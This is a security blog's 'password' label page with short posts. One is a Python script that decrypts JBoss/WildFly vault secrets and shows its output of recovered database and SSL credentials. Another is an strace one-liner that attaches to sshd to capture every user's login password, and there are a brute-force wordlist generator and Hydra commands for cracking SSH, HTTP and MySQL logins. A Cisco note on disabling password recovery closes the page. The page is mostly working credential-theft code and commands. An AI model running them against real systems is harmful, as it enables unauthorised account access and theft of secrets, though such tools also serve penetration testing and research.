Showing posts with label password. Show all posts
Showing posts with label password. Show all posts

# Decrypt Wildfly/Jboss vault passwords 


# cat standalone.xml
...
  <vault>  
      <vault-option name="KEYSTORE_URL" value="${user.home}/vault.store"/>  
      <vault-option name="KEYSTORE_PASSWORD" value="MASK-3y28rCZlcKR"/>  
      <vault-option name="KEYSTORE_ALIAS" value="vault"/>  
      <vault-option name="SALT" value="12438567"/>  
      <vault-option name="ITERATION_COUNT" value="50"/>  
      <vault-option name="ENC_FILE_DIR" value="${user.home}/vault.dat"/>  
    </vault> 
...

# cat vaultbreaker.py
import hashlib
import javaobj # pip install javaobj-py3
import jks # pip install pyjks
import string
import sys
from Crypto.Cipher import AES, DES

def clean(s):
 return filter(lambda x: x in string.printable, s).strip()

def get_derived_key(password, salt, count):
 key = password + salt
 for i in range(count):
  m = hashlib.md5(key)
  key = m.digest()
 return (key[:8], key[8:])

def customb64decode(msg):
 alphabet = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./_'
 result = ''
 for i in range(0, len(msg), 4):
  p0 = alphabet.index(msg[i])
  p1 = alphabet.index(msg[i + 1])
  p2 = alphabet.index(msg[i + 2])
  p3 = alphabet.index(msg[i + 3])
  if p0 != 64:
   result += chr(((p1 & 0x30) >> 4) | (p0 << 2))
  if p1 != 64:
   result += chr(((p2 & 0x3c) >> 2) | ((p1 & 0xf) << 4))
  result += chr(((p2 & 3) << 6) | p3)
 return result

def decrypt_keystore_password(enc_keystore_password, password, salt, iteration_count):
 num = 4 - (len(enc_keystore_password) % 4)
 if num != 4:
  enc_keystore_password = ('_' * num) + enc_keystore_password
 enc_text = customb64decode(enc_keystore_password)
 (dk, iv) = get_derived_key(password, salt, iteration_count)
 crypter = DES.new(dk, DES.MODE_CBC, iv)
 text = crypter.decrypt(enc_text)
 return clean(text)

def get_secret_key(keystore_filename, alias, keystore_password):
 ks = jks.KeyStore.load(keystore_filename, keystore_password)
 for a, sk in ks.secret_keys.items():
  if a == alias:
   return sk.key
 return null

def decrypt_vault_passwords(vault_filename, secret_key):
 decryption_suite = AES.new(secret_key, AES.MODE_ECB)
 print '[+] Vault passwords ='
 jobj = open(vault_filename).read()
 pobj = javaobj.loads(jobj)
 for i in range(0, len(pobj.annotations[1].annotations), 2):
  key = pobj.annotations[1].annotations[i]
  value = pobj.annotations[1].annotations[i + 1]
  if key:
   plain_text = decryption_suite.decrypt(str(value))
   print '\t -', key, '=', clean(plain_text)


passwd = "somearbitrarycrazystringthatdoesnotmatter"
KEYSTORE_PASSWORD = sys.argv[1]
KEYSTORE_ALIAS = sys.argv[2]
SALT = sys.argv[3]
ITERATION_COUNT = int(sys.argv[4])
keystore_filename = sys.argv[5]
vault_filename = sys.argv[6]

keystore_password = decrypt_keystore_password(KEYSTORE_PASSWORD, passwd, SALT, ITERATION_COUNT)
print '[+] Keystore password = ' + keystore_password

secret_key = get_secret_key(keystore_filename, KEYSTORE_ALIAS, keystore_password)
print '[+] Secretkey password = ' + secret_key.encode('hex')

decrypt_vault_passwords(vault_filename, secret_key)

# python vaultbreaker.py 3y28rCZlcKR vault 12438567 50 vault.store vault.dat
[+] Keystore password = vault22
[+] Secretkey password = 0e8f11aae5222d8280533a93bfaff4c3
[+] Vault passwords =
  - ssl::SSLUSER = ssl_user
  - datasource::HOST = 192.1.2.3
  - ssl::SSLPASS = ssl_pass
  - ssl::SSLALIAS = test
  - datasource::PORT = 1521
  - datasource::PASS = db_pass
  - datasource::SERVICENAME = db
  - datasource::USER = db_user

Reference

https://developer.jboss.org/wiki/JBossAS7SecuringPasswords

Done in collaboration

https://atorralba.github.io/
Posted by t0n1 0 comments
Labels: , , , , ,

# Key generator 


# cat keygen
#!/bin/bash

length=$1
alphabet="$2"
function=""

for i in `seq $length`; do
        function+="for p$i in $alphabet; do "
done
function+="echo "
for i in `seq $length`; do
        function+="\$p$i"
done
for i in `seq 1 $length`; do
        function+="; done"
done

/bin/bash -c "set -o noglob;$function"
# ./keygen 3 "{a..z} {A..Z} {0..9}"
aaa
aab
aac
aad
aae
...
995
996
997
998
999
Posted by t0n1 0 comments
Labels: , , , , ,

# Getting passwords of all users 


# strace -f -e "read" -p `ps axuf | grep -m 1 sshd | awk '{print $2}'` 2>&1 | grep -e '\\7\\0\\0\\0\\4' -e '\\v\\0\\0\\0\\10'
Posted by t0n1 0 comments
Labels: , , , ,

# Hydra: network password cracker

Introduction

Hydra
Default password list

Execution 
# apt-get install libssh-dev
# wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz
# tar xvzf hydra-6.3-src.tar.gz
# cd hydra-6.3-src
# ./configure
# make
# ./hydra -h
# ./hydra -l foo -p bar -f 127.0.0.1 http-get -m /
# ./hydra -l root -P john_password.lst 127.0.0.1 ssh -s 2222
# ./hydra -l root 8:8:a -f 127.0.0.1 mysql
Posted by t0n1 0 comments
Labels: , ,

# No service password-recovery

Introducción

No service password-recovery

Ejecución 
Switch(config)#no service password-recovery
c2960(config)#do wr
c2960(config)#do reload
Proceed with reload? [confirm]

...
The password-recovery mechanism is disabled.
Initializing Flash...
...
...done Initializing Flash.
...


The password-recovery mechanism has been triggered, but
is currently disabled.  Access to the boot loader prompt
through the password-recovery mechanism is disallowed at
this point.  However, if you agree to let the system be
reset back to the default system configuration, access
to the boot loader prompt can still be allowed.

Would you like to reset the system back to the default configuration (y/n)?y


The system has been interrupted, and the config file
has been deleted.  The following command will finish
loading the operating system software:

    boot


switch: boot
Loading "flash:c2960-lanbase-mz.122-35.SE5.bin"...
...
Would you like to terminate autoinstall? [yes]:
Would you like to enter the initial configuration dialog? [yes/no]: no
Switch>
Posted by t0n1 0 comments
Labels: , ,
Subscribe to: Posts (Atom)